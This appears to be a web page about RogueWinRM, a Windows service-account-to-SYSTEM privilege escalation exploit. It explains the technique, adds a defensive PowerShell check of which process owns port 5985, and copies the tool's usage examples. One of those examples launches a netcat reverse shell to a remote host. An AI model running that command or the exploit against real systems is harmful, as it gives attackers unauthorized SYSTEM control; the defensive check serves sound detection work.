RogueWinRM – Windows Local Privilege Escalation From Service Account To System
RogueWinRM is a local privilege escalation exploit that allows escalation from a Service account (with SeImpersonatePrivilege) to the Local System account if the WinRM service is not running (the default on Windows 10 but NOT on Windows Server 2019).
Briefly, it listens for incoming connections on port 5985, pretending to be a genuine WinRM service.
It is really just a minimal web server that tries to negotiate NTLM authentication with any service that attempts to connect on that port.
Then the BITS service (running as Local System) is triggered and tries to authenticate to our rogue listener. Once it has authenticated to our rogue listener, we are able to impersonate the Local System user and spawn an arbitrary process with those privileges.
You can find a full technical description of this vulnerability at this URL -> https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/
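The technique above only works when nothing legitimate already owns port 5985, so the defender's question is "is WinRM running, and if something is listening on 5985, is it the WinRM service host?". The PowerShell check below is an added example written for this page; it is not part of RogueWinRM or its authors' code. It assumes Windows 8 / Server 2012 or later (for Get-NetTCPConnection and Get-CimInstance) and an elevated prompt so that process paths can be read; the function name Test-WinRMPortOwner and the Suspicious flag are names chosen here.

```powershell
# Added defensive check, not part of the RogueWinRM project.
# Assumes Windows 8 / Server 2012+ and an elevated PowerShell session.

function Test-WinRMPortOwner {
    param(
        [int]$Port = 5985   # default WinRM HTTP port, the one a rogue listener would take
    )

    # The real WinRM service runs inside an svchost.exe; Win32_Service tells us which PID.
    $winrm = Get-CimInstance -ClassName Win32_Service -Filter "Name='WinRM'"
    $winrmState = if ($winrm) { $winrm.State } else { 'NotInstalled' }
    $winrmPid   = if ($winrm) { $winrm.ProcessId } else { 0 }

    $result = [ordered]@{
        WinRMState     = $winrmState
        WinRMProcessId = $winrmPid
        Listeners      = @()
        Suspicious     = $false
    }

    # Every process bound to the port in LISTEN state, with its owner resolved.
    $listeners = Get-NetTCPConnection -LocalPort $Port -State Listen -ErrorAction SilentlyContinue
    foreach ($l in $listeners) {
        $proc = Get-Process -Id $l.OwningProcess -ErrorAction SilentlyContinue
        $name = '<unknown>'
        $path = '<unknown>'
        if ($proc) {
            $name = $proc.ProcessName
            if ($proc.Path) { $path = $proc.Path }
        }
        # Legitimate only if WinRM is running AND this listener belongs to its service host.
        $isWinRM = ($winrmState -eq 'Running' -and $l.OwningProcess -eq $winrmPid)

        $entry = [pscustomobject]@{
            LocalAddress  = $l.LocalAddress
            OwningProcess = $l.OwningProcess
            ProcessName   = $name
            ProcessPath   = $path
            IsWinRM       = $isWinRM
        }
        if (-not $isWinRM) { $result.Suspicious = $true }
        $result.Listeners += $entry
    }

    [pscustomobject]$result
}

# Usage: report the state of port 5985 on this host.
$r = Test-WinRMPortOwner
if ($r.WinRMState -ne 'Running') {
    Write-Warning "WinRM service is $($r.WinRMState): port 5985 is not held by the real service."
}
if ($r.Suspicious) {
    Write-Warning "Port 5985 is bound by a process other than the WinRM service host:"
    $r.Listeners | Where-Object { -not $_.IsWinRM } | Format-Table -AutoSize
} elseif ($r.Listeners.Count -gt 0) {
    "Port 5985 is owned by the WinRM service (PID $($r.WinRMProcessId)); a rogue listener cannot bind it."
} else {
    "Nothing is listening on port 5985."
}
```

The check reports two distinct conditions: WinRM not running (the precondition this page describes, as on a default Windows 10 install) and a non-WinRM process already holding the port (a listener that should be investigated). The same logic runs over a fleet via Invoke-Command on hosts where remoting is enabled.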
Usage
RogueWinRM
Mandatory args:
-p : program to launch
Optional args:
-a : command line argument to pass to the program (default NULL)
-l : listening port (default 5985, WinRM)
-d : enable debugging output
Examples
Running an interactive cmd:
RogueWinRM.exe -p C:\windows\system32\cmd.exe
Running a netcat reverse shell:
RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10...1 3001 -e cmd"
Authors
- Antonio Cocomazzi
- Andrea Pierini
- Roberto (0xea31)